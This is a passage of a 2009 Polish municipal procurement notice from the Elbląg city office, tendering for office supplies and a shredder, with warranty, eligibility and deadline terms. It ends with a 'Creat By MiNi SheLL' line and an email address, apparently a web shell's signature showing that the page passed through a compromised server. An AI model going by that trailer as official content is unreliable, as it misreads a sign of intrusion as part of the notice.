201)	Blok do flipcharta 650x1000 - 50 kartek			- 1 szt.
202)	Markery do tablic suchościeralnych - w kompletach 
po 4 szt. (4 kolory)					- 2 op.
203)	Niszczarka - fabrycznie nowa, gotowa do pracy

Szczegółowy opis przedmiotu zamówienia dla pozycji od 1 do 202 zawiera ZAŁĄCZNIK NR 4 do SIWZ - SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - r.2009, dla pozycji 203 - ZAŁĄCZNIK NR 5 do SIWZ - Szczegółowy opis przedmiotu zamówienia: niszczarki - szt. 1.

Miejsce dostawy: Urząd Miejski w Elblągu, 82-300 Elbląg, ul. Łączności 1.

2.	Zamawiający wymaga wykonania dostawy w dwóch etapach - zgodnie z ZAŁĄCZNIKIEM NR 6 do SIWZ - Zakres zamówienia z podziałem na etapy- r.2009 

3.	Zamawiający wymaga, aby dostarczone materiały biurowe były fabrycznie nowe, w oryginalnych opakowaniach producenta, z okresem ważności dla asortymentu z każdego etapu dostawy minimum 12 miesięcy.

4.	Zamawiający wymaga udzielenia następujących gwarancji:
1)	dla kalkulatorów				- 24 miesiące
2)	dla wysokościomierza			- 24 miesiące 
3)	dla niszczarki:
a. gwarancja na urządzenie		- 24 miesiące
b. gwarancja na noże tnące		- 60 miesięcy
4)	dla pozostałego asortymentu dostawy	- minimum 12 miesięcy

5.	W pozycjach opisanych poprzez wskazania znaku towarowego, patentu lub pochodzenia dopuszcza się składanie ofert równoważnych o parametrach technicznych i wymogach jakościowych nie niższych niż przedmioty wskazane przez Zamawiającego.

6.	Dla pozycji 37, 176 i dla pozycji wyróżnionych zaciemnieniem w ZAŁĄCZNIKU NR 4 do SIWZ - SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - r.2009 oraz dla niszczarki opisanej w ZAŁĄCZNIKU NR 5 do SIWZ - Szczegółowy opis przedmiotu zamówienia: niszczarki - szt. 1. Zamawiający wymaga złożenia fotografii wraz z opisem parametrów technicznych (kart katalogowych, folderów lub innych dokumentów).
Fotografie wraz z opisem parametrów technicznych (karty katalogowe, foldery lub inne dokumenty) oferowanego asortymentu z ZAŁĄCZNIKA NR 4 do SIWZ - SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - r.2009 muszą być oznaczone numerem odpowiadającym liczbie porządkowej pozycji asortymentu z ww. ZAŁĄCZNIKA NR 4 do SIWZ. 
Fotografia wraz z opisem parametrów technicznych (karta katalogowa, folder lub inny dokument) oferowanej niszczarki musi wskazywać, że dotyczy niszczarki opisanej przez Zamawiającego w ww. ZAŁĄCZNIKU NR 5 do SIWZ. 

7.	Dla asortymentu oferowanego przez Wykonawcę jako równoważny do opisanego przez Zamawiającego w SIWZ Zamawiający wymaga złożenia fotografii wraz z opisem parametrów technicznych (kart katalogowych, folderów lub innych dokumentów).
Fotografie wraz z opisem parametrów technicznych (karty katalogowe, foldery lub inne dokumenty) asortymentu oferowanego przez Wykonawcę jako równoważny do opisanego przez Zamawiającego w SIWZ z ZAŁĄCZNIKA NR 4 do SIWZ - SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - r.2009 muszą być oznaczone numerem odpowiadającym liczbie porządkowej pozycji asortymentu z ww. ZAŁĄCZNIKA NR 4 do SIWZ. 
8.	Zamawiający informuje, że zgodnie z ustawą Prawo zamówień publicznych Wykonawca, który złoży ofertę zawierającą rozwiązania równoważne do opisanych przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego. 
W związku z powyższym Zamawiający wymaga, aby Wykonawca w ZAŁĄCZNIKU NR 7 do SIWZ WYCENA DOSTAWY w kolumnie Opis asortymentu  wskazał i opisał asortyment, który oferuje Zamawiającemu jako równoważny do opisanego przez Zamawiającego w ZAŁĄCZNIKU NR 4 do SIWZ SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - r.2009.

9.	Zamawiający wymaga, aby asortyment opisany w ZAŁĄCZNIKU NR 4 do SIWZ - SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - r.2009, który ma określoną gramaturę papieru lub tektury posiadał oznaczenie tej gramatury na poszczególnych przedmiotach zamówienia lub na zbiorowym opakowaniu, bądź inny dokument potwierdzający spełnienie tych wymagań. 

10.	Informacja o przewidywanych zmianach postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru oferty:

Zamawiający nie przewiduje zmian postanowień zawartej umowy.

11.	Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.

12.	Informacje o przewidywanych zamówieniach uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 i 7 lub art. 134 ust. 6 pkt 3 i 4, jeżeli Zamawiający przewiduje udzielenie takich zamówień:

Zamawiający nie przewiduje udzielenia zamówień uzupełniających.

13.	Zakres zamówienia:

Zakres zamówienia obejmuje dostawę materiałów biurowych. Szczegółowy zakres zamówienia z podziałem na etapy dostawy zawiera  ZAŁĄCZNIK NR 6 do SIWZ - Zakres zamówienia z podziałem na etapy- r.2009.

Zamawiający wymaga złożenia:

 - zgodnie z pkt VI ppkt 2.1. SIWZ Oświadczenia wynikającego z art. 25 ust. 1 pkt 2)    ustawy Prawo zamówień    publicznych.
Uwaga:
a)	   Treść wymaganego Oświadczenia Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa  każdy      
       z  Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

- zgodnie z pkt VI. ppkt 2.2. SIWZ Fotografii wraz z opisem parametrów technicznych (karty katalogowe, foldery lub inne dokumenty) dla pozycji 37, 176 i dla pozycji wyróżnionych zaciemnieniem w ZAŁĄCZNIKU NR 4 do SIWZ - SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - r.2009 oraz dla niszczarki opisanej w ZAŁĄCZNIKU NR 5 do SIWZ - Szczegółowy opis przedmiotu zamówienia: niszczarki - szt. 1. potwierdzające, że oferowany asortyment spełnia wymagania Zamawiającego, a także dla asortymentu oferowanego przez Wykonawcę jako równoważny do opisanego przez Zamawiającego w SIWZ. 
Uwaga:
a)	Fotografie wraz z opisem parametrów technicznych (karty katalogowe, foldery lub inne dokumenty) dla pozycji 37, 176 i dla pozycji wyróżnionych zaciemnieniem w ZAŁĄCZNIKU NR 4 do SIWZ - SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - r.2009 oraz dla niszczarki opisanej w ZAŁĄCZNIKU NR 5 do SIWZ - Szczegółowy opis przedmiotu zamówienia: niszczarki - szt. 1. muszą być oznaczone numerem odpowiadającym liczbie porządkowej pozycji asortymentu z ww. ZAŁĄCZNIKA NR 4 do SIWZ. 
Fotografia wraz z opisem parametrów technicznych (karta katalogowa, folder lub inny dokument) oferowanej niszczarki musi wskazywać, że dotyczy niszczarki opisanej przez Zamawiającego w ww. ZAŁĄCZNIKU NR 5 do SIWZ. 
b)	Fotografie wraz z opisem parametrów technicznych (karty katalogowe, foldery lub inne dokumenty) asortymentu oferowanego przez Wykonawcę jako równoważny do opisanego przez Zamawiającego w SIWZ z ZAŁĄCZNIKA NR 4 do SIWZ - SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - r.2009 muszą być oznaczone numerem odpowiadającym liczbie porządkowej pozycji asortymentu z ww. ZAŁĄCZNIKA NR 4 do SIWZ. 
c)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. fotografie wraz z opisem parametrów technicznych oferowanego asortymentu Wykonawcy składają wspólnie.

- zgodnie z pkt VI. ppkt 2.3. SIWZ Zgodnie z zapisami pkt III. ppkt 8 SIWZ, w przypadku zaoferowania przez Wykonawcę asortymentu równoważnego do opisanego przez Zamawiającego Wykonawca, w celu potwierdzenia, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego w SIWZ, musi opisać asortyment oferowany Zamawiającemu jako równoważny do opisanego przez Zamawiającego w ZAŁĄCZNIKU NR 4 do SIWZ - SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - r.2009. Opisy asortymentu oferowanego przez Wykonawcę jako równoważny do opisanego przez Zamawiającego należy umieścić w kolumnie Opis asortymentu ZAŁĄCZNIKA NR 7 do SIWZ WYCENA DOSTAWY. Opisy asortymentu oferowanego przez Wykonawcę jako równoważny do opisanego przez Zamawiającego umieszczone w kolumnie Opis asortymentu  ZAŁĄCZNIKA NR 7 do SIWZ WYCENA DOSTAWY muszą odpowiadać liczbie porządkowej pozycji asortymentu z ZAŁĄCZNIKA NR 4 do SIWZ SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - r.2009..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.12.40.00-4, 22.85.10.00-0, 22.85.00.00-3, 22.80.00.00-8, 39.24.10.00-3, 30.19.14.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych i spełniający warunki art. 22 ust. 1 tj. Wykonawcy, którzy:

1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;

Warunkiem udziału w postępowaniu jest:
a) wykonanie w sposób należyty w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia minimum 2 dostaw materiałów biurowych odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia o wartości minimum 100 000,00 zł netto każda;

3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

1) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 1. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt. VI. ppkt 1.1. SIWZ i dokumentu wymienionego w pkt. VI. ppkt 1.2. SIWZ.
2) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2.a) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ i dokumentów wymienionych w pkt VI. ppkt 1.3. SIWZ.
     Przy ocenie spełnienia tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 3. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.
4) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 4. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI. SIWZ, metodą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga dostarczenia:

-  zgodnie z pkt VI. ppkt 1.1. SIWZ - Oświadczeń wynikających z art. 22 i 24 ustawy Prawo zamówień publicznych.
Uwaga:
a)	Treść wymaganych Oświadczeń Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

-  zgodnie z pkt VI. ppkt 1.2. SIWZ - Aktualnego  odpisu  z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Uwaga:
a)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

-   zgodnie z pkt VI. ppkt 1.3. Wykazu wykonanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenie dokumentów potwierdzających, że te dostawy zostały wykonane należycie.
Uwaga:
a) W wykazie należy wymienić dostawy potwierdzające spełnienie przez Wykonawcę warunku     wymienionego w Sekcji III.2) pkt 2.a) ogłoszenia.
b)   Dla dostaw wymienionych w wykazie należy załączyć dokumenty potwierdzające, że te dostawy 
      zostały wykonane należycie.
c)  W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, wielkości stanowiące o spełnieniu warunku będą zsumowane.

Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.

UWAGA:

1.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
1)  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
	
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
	
2.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 1. UWAGI zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3.	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125, 82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2009 godzina 09:30, miejsce: Urząd Miejski w Elblągu
 Wydział Zamówień Publicznych pokój 125, 82-300 Elbląg ul. Łączności 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Opłata za SIWZ obejmuje koszty jej druku oraz przekazania.
CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA	
do 28 sierpnia 2009 r.
w tym:
I etap dostawy	- do 14 dni od daty udzielenia zamówienia

Creat By MiNi SheLL
Email: jattceo@gmail.com